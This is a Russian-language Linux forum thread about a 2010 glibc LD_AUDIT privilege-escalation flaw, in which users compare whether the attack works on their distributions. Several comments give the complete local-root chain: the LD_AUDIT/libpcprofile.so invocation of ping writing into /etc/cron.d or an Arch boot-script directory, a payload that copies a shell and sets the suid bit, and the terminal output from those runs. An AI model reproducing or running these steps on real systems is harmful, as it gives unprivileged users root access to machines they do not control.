LINUX.ORG.RU

Новый метод взлома, основанный на glibc

 , ,


0

1

Найден очередной метод взлома, основанный на glibc. Подвержены большинство Linux-систем, на которых установлена glibc версии 2.4 и выше. Проверено, что дистрибутивы OpenWall и Alt Linux не подвержены атаке, потому что у них установлен патч sanitize-env.

Смысл уязвимости — неправильные проверки при динамическом связывании в режиме LD_AUDIT библиотек с исполняемыми файлами, для которых установлены suid/sgid.
По идее, система должна блокировать LD_PRELOAD для загрузки из нестандартных областей файловой системы (/lib, /usr/lib), но не в этом случае.

Новость на opennet.ru


Обсуждение в Talks

>>> Подробности

Ответ на: комментарий от debian6

Теперь у Касперского есть серьезные доводы для использования в рекламе.

Только вот как Антивирусу Касперского предполагается чинить glibc?!...

stevejobs ★★★★☆ ()

debian sid amd64 - не сработало
debian lenny x86 - сработало.

maloi ★★★★★ ()

Смотрю, самый крутой способ для этих эксплоитов - заменить ping на что нибудь полезное, например на мгновенное выключение компьютера. :)

debian6 ()
Ответ на: комментарий от samy_volosaty

>gentoo amd64 glibc видать тоже патченый?
У меня файл создался и редактируется, но крон не сработал:
(*system*) BAD FILE MODE (/etc/cron.d/exploit)

xorik ★★★★★ ()
Ответ на: комментарий от xorik

я про umask забыл.

может и заработает. пока некогда проверить...

samy_volosaty ★★★★★ ()

Stop reopening this vulnerability! :)

Zubok ★★★★★ ()

PR AltLinux на LOR идёт полным ходом (:

renya ★★★★★ ()
Ответ на: комментарий от samy_volosaty

gentoo amd64 glibc видать тоже патченый?


не работает.

ну ты не расстраивайся, все будет хорошо, у тебя потом получится, мы в тебя верим...

chevyk ()
Ответ на: комментарий от triknot

>В Slackware уже 2 дня как закрыли уязвимость.

Эту вроде пока не закрыли.

dn2010 ★★★★★ ()

что дистрибутивы OpenWall и Alt Linux, не подвержены атаке

Всем пофиг же

anonymous ()

Аплодисменты Дрепперу стоя.

Pavval ★★★★★ ()

Mint 9 x64. Только что приехало обновление glibc. Не работает.

Oyster ()

> для загрузки из нестандартных областях

Может все таки из областей?

OxiD ★★★ ()

Разве есть еще те камикадзы кто использует glibc версии >= 2.4 ? Оно ведь не работает из-за nptl с ядрами 2.4

anonymous ()

Стабильный дебиан. Только что обновление на glibc прилетело из security.

anonymous ()

А кони всё скачут и скачут, А избы горят и горят (С)

maxkit ()

Постоянно проверяю все експлоиты, которые сдесь выкладывают. Еще ни один не сработал. Ubuntu Server.

-rw-r--r-- 1 root vertexua 4 2010-10-23 13:20 /etc/cron.d/exploit

А должно было каким-то чудом образоваться

-rw-rw-rw-

vertexua ★★★★☆ ()
Ответ на: комментарий от vertexua

Ах, да, месяц наверное не обновляли, может больше

vertexua ★★★★☆ ()
Ответ на: комментарий от AndreyKl

Не делал )))) Все сработало. Забираю свои слова назад

vertexua ★★★★☆ ()
Ответ на: комментарий от Versed

>Arch Linux any — не работает.

У меня в арче файл создаётся (а это самое главное).

Где можно подробней про запуск прочитать?


На опеннете всё расписано по шагам.

AX ★★★★★ ()

На gentoo файл создается и редактируется, но не исполняется:

(*system*) BAD FILE MODE (/etc/cron.d/exploit1)

MC ()

На CentOS 5.5 не заработало:

[user@localhost ~]$ umask 0
[user@localhost ~]$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination

[user@localhost ~]$ printf "* * * * * root cp /bin/bash /tmp/exploit; chmod u+s /tmp/exploit\n" > /etc/cron.d/exploit
bash: /etc/cron.d/exploit: Permission denied

При этом файл /etc/cron.d/exploit создаётся, но записать в него почему-то не получается.

[root@localhost]# ls -l /etc/cron.d/exploit 
-rw-rw-rw- 1 root user 4 Oct 23 14:34 /etc/cron.d/exploit
[user@localhost ~]$ rpm -qf /usr/lib/libpcprofile.so 
glibc-utils-2.5-49.el5_5.6
[user@localhost ~]$ rpm -q glibc-utils --changelog | head
* Tue Oct 19 2010 Andreas Schwab <schwab@redhat.com> - 2.5-49.el5_5.6
- Never expand $ORIGIN in privileged programs (#643818, CVE-2010-3847)

* Sat Sep 25 2010 Andreas Schwab <schwab@redhat.com> - 2.5-49.el5_5.5
- Restore locking in free_check (#637067)

* Fri Jul 16 2010 Andreas Schwab <schwab@redhat.com> - 2.5-49.el5_5.4
- Fix POWER6 memcpy/memset (#614546)

* Wed Jun 16 2010 Andreas Schwab <schwab@redhat.com> - 2.5-49.el5_5.3
[

anonymous ()
Ответ на: комментарий от anonymous

Впрочем, не получается видимо потому, что права на /etc/cron.d - 700.

anonymous ()
Ответ на: комментарий от samy_volosaty

Крон тот же самый vixie-cron.

Копии не будет, крон не выполнить данную команду, ну не нравятся ему такие права.

MC ()

especially for ArchLinux users:

umask 0
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/rc.d/functions.d/exploit" ping
echo -e '#!/bin/bash\ncp /bin/dash /usr/bin/sdash\nchmod u+s /usr/bin/sdash' > /etc/rc.d/functions.d/exploit
sudo reboot

/usr/bin/sdash -c 'whoami'
/usr/bin/sdash -c 'rm -f /usr/bin/sdash /etc/rc.d/functions.d/exploit'
ei-grad ★★★★★ ()
Ответ на: комментарий от vertexua

нету её под рукой, уже года два не пользовался...

ei-grad ★★★★★ ()
$ cat /etc/issue
Debian GNU/Linux 5.0 \n \l

работает, но не до конца, файл создается, но крон его не выполняет:

cron[2629]: Error: bad minute; while reading /etc/cron.d/exploit
$ cat /etc/cron.d/exploit 
* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit

на debian testing файл не создается

$ umask 0
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface]
            [-M pmtudisc-hint] [-m mark] [-S sndbuf]
            [-T tstamp-options] [-Q tos] [hop1 ...] destination
$ ls -l /etc/cron.d/exploit
ls: невозможно получить доступ к /etc/cron.d/exploit: Нет такого файла или каталога
$ 

anonymous ()
Ответ на: комментарий от vertexua

Не помню ни одной книжки про Линух где было бы
написано про то, что сам себе суидный бит это хорошо.

Опять же по умолчанию селинукс врублен если что ...

И вообще затрудняюсь вспомнить сервак с локальными ( баш ) юзерами ...

И кстати а пинг вообще зачем локальным юзерам то ? Может им тогда
сразу открыть tcpdump ?

mx__ ★★★★★ ()
Ответ на: комментарий от vertexua

> Я не проверял, но разве критично что это ping

Например в книжке по слаке ( если я не ошибаюсь )
тама финдом ищут все проги с суидом в тюкают их ...

И вообще я уже сказал про локальных юзерах на серваках, хз
кто это. ( с бин-баш в смысле )

mx__ ★★★★★ ()

Создается но писать в файл не дает.

От рута конечно работает.

anonymous ()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.